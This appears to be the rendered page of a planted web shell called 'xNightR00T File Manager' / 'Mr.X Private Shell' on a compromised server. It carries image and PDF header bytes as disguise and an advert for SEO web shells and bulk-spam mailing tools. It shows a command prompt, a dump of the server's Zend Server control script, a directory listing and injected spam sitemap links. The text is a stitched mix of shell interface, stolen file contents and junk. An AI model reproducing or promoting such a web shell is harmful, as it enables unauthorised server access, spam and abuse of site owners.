xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/bash

if [ -f /etc/zce.rc ];then
    . /etc/zce.rc
else
    echo "/etc/zce.rc doesn't exist!"
#    exit 1;
fi
if [ -f $ZCE_PREFIX/bin/shell_functions.rc ];then
    . $ZCE_PREFIX/bin/shell_functions.rc
else
    echo "$ZCE_PREFIX/bin/shell_functions.rc doesn't exist!"
#    exit 1;
fi
check_root_privileges
export ZEND_TMPDIR=$ZCE_PREFIX/tmp 

usage()
{
    $ECHO_CMD "Usage: $0 <action>"
    $ECHO_CMD ""
    for ACTION in start stop restart; do
        $ECHO_CMD "$ACTION\n\t$ACTION all $PRODUCT_NAME daemons"
	SYSTEMD_PREFIX=/lib/systemd/system
	if [ -f $SYSTEMD_PREFIX/httpd.service ]; then
		SHORT_NAME="apache"
		$ECHO_CMD "$ACTION-$SHORT_NAME\n\t$ACTION $SHORT_NAME only.";
	elif [ -f $SYSTEMD_PREFIX/nginx.service ]; then
		SHORT_NAME="nginx"
		$ECHO_CMD "$ACTION-$SHORT_NAME\n\t$ACTION $SHORT_NAME only.";
	fi
	if [ -f $SYSTEMD_PREFIX/php-fpm.service ]; then
		SHORT_NAME="php-fpm"
		$ECHO_CMD "$ACTION-$SHORT_NAME\n\t$ACTION $SHORT_NAME only.";
	fi
        for SCRIPT in $SYSTEMD_PREFIX/zend-*.service; do  
		SHORT_NAME=`grep Alias $SCRIPT| cut -d= -f2`
		if [ -n "$SHORT_NAME" ]; then
			$ECHO_CMD "$ACTION-$SHORT_NAME\n\t$ACTION $SHORT_NAME only.";
		fi
        done
        $ECHO_CMD "\n"
    done
    $ECHO_CMD "setup-jb            Setup Java bridge"
    $ECHO_CMD "version             Print $PRODUCT_NAME version"
    $ECHO_CMD "status              Get $PRODUCT_NAME status"
    $ECHO_CMD ""
    $ECHO_CMD "For more information about this script see"
    $ECHO_CMD "http://files.zend.com/help/Zend-Server/zend-server.htm#linux_mac__package_setup_and_control_scripts.htm"
}
case $1 in
	"start")
		$ECHO_CMD "Starting $PRODUCT_NAME $PRODUCT_VERSION ..\n"
		$ECHO_CMD "\n$PRODUCT_NAME started..."
		/bin/systemctl $1 zend-server.service
		;;

	"stop")
		$ECHO_CMD "Stopping $PRODUCT_NAME $PRODUCT_VERSION ..\n"
		/bin/systemctl $1 zend-server.service
		$ZCE_PREFIX/bin/clean_semaphores.sh
		$ECHO_CMD "\n$PRODUCT_NAME stopped."
		;;

	"start-apache" | "apache-start")
                if [ -x $ZCE_PREFIX/bin/apachectl ];then
                    $ZCE_PREFIX/bin/apachectl start
                fi
		;;

	"start-lighttpd" | "lighttpd-start")
		if [ -x $ZCE_PREFIX/bin/lighttpdctl.sh ];then
                	$ZCE_PREFIX/bin/lighttpdctl.sh start
		fi
		;;

	"start-nginx" | "nginx-start")
		if [ -x $ZCE_PREFIX/bin/nginxctl.sh ];then
			echo -n "Starting nginx: "
                	$ZCE_PREFIX/bin/nginxctl.sh start
			if [ $? -eq 0 ]; then
				echo "[OK]";
			else
				echo "[FAIL]";
			fi
		fi
		;;

	"start-fpm" | "fpm-start" | "start-php-fpm" | "php-fpm-start")
		if [ -x $ZCE_PREFIX/bin/php-fpm.sh ];then
                	$ZCE_PREFIX/bin/php-fpm.sh start
		fi
		;;

	"start-monitor" | "monitor-start")
                if [ -x $ZCE_PREFIX/bin/monitor-node.sh ];then
                    $ZCE_PREFIX/bin/monitor-node.sh start
                fi
                ;;
		
	"start-scd" | "scd-start")
                if [ -x $ZCE_PREFIX/bin/scd.sh ];then
                    $ZCE_PREFIX/bin/scd.sh start
                fi
		;;
		
	"start-statsd" | "statsd-start")
                if [ -x $ZCE_PREFIX/bin/statsd.sh ];then
                    $ZCE_PREFIX/bin/statsd.sh start
                fi
        ;;

	"start-jobqueue" | "jobqueue-start")
                if [ -x $ZCE_PREFIX/bin/jqd.sh ];then
                    $ZCE_PREFIX/bin/jqd.sh start
                fi
		;;
		
	"start-jb" | "jb-start")
                if [ -x $ZCE_PREFIX/bin/java_bridge.sh ];then
                    $ZCE_PREFIX/bin/java_bridge.sh start
		fi
		;;

	"start-deployment" | "deployment-start")
                if [ -x $ZCE_PREFIX/bin/zdd.sh ];then
                    $ZCE_PREFIX/bin/zdd.sh start
                fi
		;;

	"start-zsd" | "zsd-start")
                if [ -x $ZCE_PREFIX/bin/zsd.sh ];then
                    $ZCE_PREFIX/bin/zsd.sh start
                fi
		;;

	"stop-apache" | "apache-stop")
                if [ -x $ZCE_PREFIX/bin/apachectl ];then
                    $ZCE_PREFIX/bin/apachectl stop
			# Clean datacache SHM files (JIRA issue ZSRV-1952)
			for DIR in $ZCE_PREFIX/tmp /tmp; do
				rm -f $DIR/zshm_ZShmStorage_*
			done
                fi
		;;

	"stop-lighttpd" | "lighttpd-stop")
		if [ -x $ZCE_PREFIX/bin/lighttpdctl.sh ];then
                	$ZCE_PREFIX/bin/lighttpdctl.sh stop
		fi
		;;

	"stop-nginx" | "nginx-stop")
		if [ -x $ZCE_PREFIX/bin/nginxctl.sh ];then
			echo -n "Stopping nginx: "
                	$ZCE_PREFIX/bin/nginxctl.sh stop
			if [ $? -eq 0 ]; then
				echo "[OK]";
			else
				echo "[FAIL]";
			fi
		fi
		;;

	"stop-fpm" | "fpm-stop" | "stop-php-fpm" | "php-fpm-stop")
		if [ -x $ZCE_PREFIX/bin/php-fpm.sh ];then
                	$ZCE_PREFIX/bin/php-fpm.sh stop
			# Clean datacache SHM files (JIRA issue ZSRV-1952)
			for DIR in $ZCE_PREFIX/tmp /tmp; do
				rm -f $DIR/zshm_ZShmStorage_*
			done
		fi
		;;

	"stop-monitor" | "monitor-stop")
                if [ -x $ZCE_PREFIX/bin/monitor-node.sh ];then
                    $ZCE_PREFIX/bin/monitor-node.sh stop
                fi
		;;

	"stop-scd" | "scd-stop")
                if [ -x $ZCE_PREFIX/bin/scd.sh ];then
                    $ZCE_PREFIX/bin/scd.sh stop
                fi
		;;

	"stop-statsd" | "statsd-stop")
                if [ -x $ZCE_PREFIX/bin/statsd.sh ];then
                    $ZCE_PREFIX/bin/statsd.sh stop
                fi
		;;

	"stop-jobqueue" | "jobqueue-stop")
                if [ -x $ZCE_PREFIX/bin/jqd.sh ];then
                    $ZCE_PREFIX/bin/jqd.sh stop
                fi
		;;

	"stop-jb" | "jb-stop")
                if [ -x $ZCE_PREFIX/bin/java_bridge.sh ];then
                    $ZCE_PREFIX/bin/java_bridge.sh stop
		fi
		;;

	"stop-deployment" | "deployment-stop")
                if [ -x $ZCE_PREFIX/bin/zdd.sh ];then
                    $ZCE_PREFIX/bin/zdd.sh stop
                fi
		;;

	"stop-zsd" | "zsd-stop")
                if [ -x $ZCE_PREFIX/bin/zsd.sh ];then
                    $ZCE_PREFIX/bin/zsd.sh stop
                fi
		;;

	"restart-lighttpd" | "lighttpd-restart")
		if [ -x $ZCE_PREFIX/bin/lighttpdctl.sh ];then
                	$ZCE_PREFIX/bin/lighttpdctl.sh restart
		fi
		;;

	"restart-nginx" | "nginx-restart")
		if [ -x $ZCE_PREFIX/bin/nginxctl.sh ];then
                	$ZCE_PREFIX/bin/nginxctl.sh restart
		fi
		;;

	"restart-fpm" | "fpm-restart" | "restart-php-fpm" | "php-fpm-restart")
		$0 stop-fpm
		sleep 1
		$0 start-fpm
		;;

	"restart-scd" | "scd-restart")
                if [ -x $ZCE_PREFIX/bin/scd.sh ];then
                    $ZCE_PREFIX/bin/scd.sh restart
                fi
		;;

	"restart-statsd" | "statsd-restart")
				if [ -x $ZCE_PREFIX/bin/statsd.sh ];then
					$ZCE_PREFIX/bin/statsd.sh restart
				fi
		;;

	"restart-monitor" | "monitor-restart")
                if [ -x $ZCE_PREFIX/bin/monitor-node.sh ];then
                    $ZCE_PREFIX/bin/monitor-node.sh restart
                fi
		;;

	"restart-jobqueue" | "jobqueue-restart")
                if [ -x $ZCE_PREFIX/bin/jqd.sh ];then
                    $ZCE_PREFIX/bin/jqd.sh restart
                fi
		;;

	"restart-deployment" | "deployment-restart")
                if [ -x $ZCE_PREFIX/bin/zdd.sh ];then
                    $ZCE_PREFIX/bin/zdd.sh restart
                fi
		;;

	"restart-zsd" | "zsd-restart")
                if [ -x $ZCE_PREFIX/bin/zsd.sh ];then
                    $ZCE_PREFIX/bin/zsd.sh restart
                fi
		;;

	"restart-jb" | "jb-restart")
                if [ -x $ZCE_PREFIX/bin/java_bridge.sh ];then
                    $ZCE_PREFIX/bin/java_bridge.sh restart
		fi
		;;

	"setup-jb" | "jb-setup")
                if [ -x $ZCE_PREFIX/bin/setup_jb.sh ];then
                    $ZCE_PREFIX/bin/setup_jb.sh
                else
                    echo "Java bridge is not installed, please install the java-bridge-zend-$DIST package."
                fi
		;;

	"restart-apache" | "apache-restart")
		$0 stop-apache
		sleep 2
		$0 start-apache
		;;

	"restart")
		$0 stop
		sleep 2 
		$0 start
		;;

	"status")
		/bin/systemctl status 'zend*' -n 0
		;;


        "version")
                $ECHO_CMD "$PRODUCT_NAME version: $PRODUCT_VERSION"
                ;;

	*)	
                usage
                exit 1
		;;
esac

Filemanager

Name Type Size Permission Actions
MonitorNode File 610.86 KB 0755
ZManifest File 48.29 KB 0755
clean_semaphores.sh File 1.86 KB 0755
composer.phar File 2.09 MB 0755
composer.sh File 63 B 0755
create_cert.sh File 920 B 0755
extract_meta_data.sh File 448 B 0755
gui_passwd.php File 5.55 KB 0644
jqd File 1.56 MB 0755
jqd.sh File 40 B 0755
lighttpdctl.sh File 40 B 0755
monitor-node.sh File 39 B 0755
nginxctl.sh File 42 B 0755
php File 239 B 0755
php-fpm File 6.03 MB 0755
php-fpm.sh File 44 B 0755
scd File 1.08 MB 0755
scd.sh File 35 B 0755
shell_functions.rc File 5.3 KB 0755
statsd File 373.73 KB 0755
statsd.sh File 38 B 0755
support_tool.sh File 2.05 KB 0755
uninstall.sh File 1.54 KB 0755
watchdog File 100.95 KB 0755
zdd File 1.51 MB 0755
zdd.sh File 42 B 0755
zdpack File 3.2 MB 0755
zendctl.sh File 8.02 KB 0755
zmd File 19.75 KB 0755
zs-client.sh File 382 B 0755
zs-manage File 806 B 0755
zsd File 1.97 MB 0755
zsd.sh File 35 B 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml